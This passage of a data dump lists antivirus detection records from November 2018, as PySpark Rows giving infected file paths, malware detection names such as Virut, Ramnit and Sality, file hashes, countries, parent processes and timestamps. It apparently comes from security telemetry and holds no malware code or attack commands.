  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fabd9f8c7b4e5ff73d373254416d0ce1886816f9427e53996f3e96d4e8be7087', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:29:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062044-8b2852f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234307-8D092D33\\AVSCAN-20181102-062044-8B2852F3', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T03:23:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='shark_launcher.exe', filepath='G:\\العاب\\صيد بط وفراخ ومزارع\\shark\\shark_launcher.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='bce6660ee7b87f78ad19023a3c27dd30cb37cd6c5e8f7fc9edbcbbc39d568399', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T11:13:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-204224-5ed3b10f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-204224-5ED3B10F', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:42:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b54e', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b54e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:14:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='icomboobject.dll', filepath='C:\\Microgaming\\Poker\\BetssonMPP\\control\\icomboobject.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='c680cd43a2a262cb06a2d0c8f5b61dd8ddb013814b6c32f7736db553f6f6b66a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Microgaming\\Poker\\BetssonMPP\\mppoker.exe', parentsize=1289976, timestamp='2018-11-04T03:31:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297121', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297121', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:39:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d3888b29071bb352e22633c06bdb76df35e32ff1b5f19386b7ac51711e2f7594', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D3888B29071BB352E22633C06BDB76DF35E32FF1B5F19386B7AC51711E2F7594', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d3888b29071bb352e22633c06bdb76df35e32ff1b5f19386b7ac51711e2f7594', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:31:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239cc4', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239cc4', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:48:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00004c6c', filepath='C:\\Windows\\Temp\\tmp00007bad\\tmp00004c6c', filesize=12800000, name='TR/Patched.Ren.Gen.#M300.#R3134'), hash='ebca7c22926757c18e4cef1fe92b5c582526d4057456c41f1e4298a511645a74', metadata=Row(cmdline='-k bdx -s scan', country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-04T18:59:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238953', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238953', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:27:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029515a', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029515a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:56:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e9ce', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e9ce', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:04:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090524-6f5e606e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca757762\\AVSCAN-20181104-084814-A417CACE\\AVSCAN-20181104-090524-6F5E606E', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='c734a2651f32e3b9bbb167743dab8154bbeefdb89453fdf46214ca42affc01fb', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T02:05:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-164656-eed1ebab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_95369046\\AVSCAN-20181104-164332-D4C777B9\\AVSCAN-20181104-164656-EED1EBAB', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='e4dfd76ff691da02eaa433eaf389fc35898121c798cf50c4e2e3b1ddd7e5cf23', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:46:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T03:56:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:51:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111032-68d0d9cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a444de52\\AVSCAN-20181104-110927-5E2F5216\\AVSCAN-20181104-111032-68D0D9CD', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:10:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dhl invoice notification-awb no 264772786300.msg', filepath='\\\\?\\D:\\Mladen\\Sacuvani email\\Reinstalacija-31.10.2018\\Email-31.10.2018-deleted\\DHL Invoice Notification-AWB NO 264772786300.msg', filesize=448000, name='HEUR/AGEN.1001615.#M1.#R1'), hash='f06413440e338162a5f19dfc3328b2bf96dd39f225a8a08ad8764d50574b8d68', metadata=Row(cmdline=None, country='ME', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:17:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:42:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='network_driver_4fw6k_wn_15.10.0.10_a03.exe', filepath='E:\\Programs\\Compressed\\all drivers for dell Latitude E6510\\win7 32 & 64bit\\Network_Driver_4FW6K_WN_15.10.0.10_A03.EXE', filesize=130688000, name='TR/Patched.Gen.#M300.#R3374'), hash='f56a8ebc78bfd60f2e56eeafc5e0628888734e2a06538363267370f4af4b2e65', metadata=Row(cmdline='\\\\\\/Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}', country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dllhost.exe', parentsize=7168, timestamp='2018-11-01T15:24:05Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T23:08:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:04:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='aplikasi-pkg-sg14032015.xls', filepath='G:\\pn ku\\Aplikasi-PKG-SG14032015.xls', filesize=7296000, name='X2000M/Agent.91364890.#M1.#R1'), hash='3330815b83ddf3ecf2e7b7bddfb83ae9fde8c7b9adf2fd92dcb406a9287a9860', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-02T06:03:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151319-d32816cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ca656e6\\AVSCAN-20181102-151220-C6FED76F\\AVSCAN-20181102-151319-D32816CD', filesize=720000, name='PUA/InstallCore.Gen.#M300.#R5961'), hash='38583d6da1a5ee97df361ff2b804765c341eccab1ffa133835c026adfb52073d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:13:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='18ece932dc5ab9b84c12acae0b09bb3e431b8b82e92e0216d395101d51957f56', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T15:22:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nexustk.exe_25c88ee8d81e408c9fb88c09c1e79577.exe', filepath='C:\\Windows\\Installer\\{4D6DE8B6-B0A0-4F2C-BEBE-1FA024E7B951}\\NexusTK.exe_25C88EE8D81E408C9FB88C09C1E79577.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='47bca412c73d6068cf5373d9c2447a99619a7da7c632c9270b9a050af6595930', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T04:23:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3d5ec02ecb4fd63f5b804aacd3ded40da54ee436bff151da545de7216c5b67f0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3D5EC02ECB4FD63F5B804AACD3DED40DA54EE436BFF151DA545DE7216C5B67F0', filesize=1312000, name='TR/Crypt.XPACK.Gen.#M300.#R3904'), hash='3d5ec02ecb4fd63f5b804aacd3ded40da54ee436bff151da545de7216c5b67f0', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:06:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1645062b724c29a0914bda3bcd3cc4491b5e9b20', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\1645062b724c29a0914bda3bcd3cc4491b5e9b20', filesize=384000, name='HEUR/AGEN.1029348.#M1.#R1'), hash='1068de664d5b83e7490f5a8ea69de8cd30a192b4af0ba9fc1d261f571e8b92cb', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:20:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unwise.exe', filepath='C:\\Transtool\\Unwise.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='085055e90c76f7bcfbc46a1295c53fcb58ab0a1953ac7fe118c7261314a6d766', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T09:24:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140530-803fe261', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cab3c85\\AVSCAN-20181102-140456-79007B41\\AVSCAN-20181102-140530-803FE261', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:05:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:18:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:05:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jssw.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\JSSW\\JSSW.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='57b9600099d2eca388122b49d11e11f9010a9842406c4c95e8795eab2b068565', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\57B9600099D2ECA388122B49D11E11F9010A9842406C4C95E8795EAB2B068565', filesize=3200000, name='HEUR/AGEN.1026734.#M1.#R1'), hash='57b9600099d2eca388122b49d11e11f9010a9842406c4c95e8795eab2b068565', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:14:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:43:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-080009-3c9ca3ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4445c0e1\\AVSCAN-20181102-075759-2E42F5CA\\AVSCAN-20181102-080009-3C9CA3FF', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:00:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-214811-99ed463d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de73ea47\\AVSCAN-20181102-212012-CCFF919C\\AVSCAN-20181102-214811-99ED463D', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T19:48:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='stage1_se.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\STAGE1_SE\\STAGE1_SE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-000110-8484e364', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9d946e90\\AVSCAN-20181101-235553-5A2CC07B\\AVSCAN-20181102-000110-8484E364', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:02:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='non_token.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\mm\\non_token\\non_token.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140457-b6fca73d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-140211-A771A7C2\\AVSCAN-20181102-140457-B6FCA73D', filesize=1088000, name='EXP/Excel.Exploit.Gen.#M1.#R1'), hash='46fca5e52395ecf0f3467a783e0bffb96a30de97377a885a87b67b367c7c014a', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:05:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='15eb3c37d6bda8e312878d03029d29c179720763c0370ba35b782a29961cab24', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T13:20:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='st3.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\VOICE\\ST3\\ST3.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='21ec64398af28f12b7e61e9f7f765864cb4960f3adbd9599632f011dc8d24de7', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:28:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:52Z'), dt=datetime.date(2018, 11, 2)),
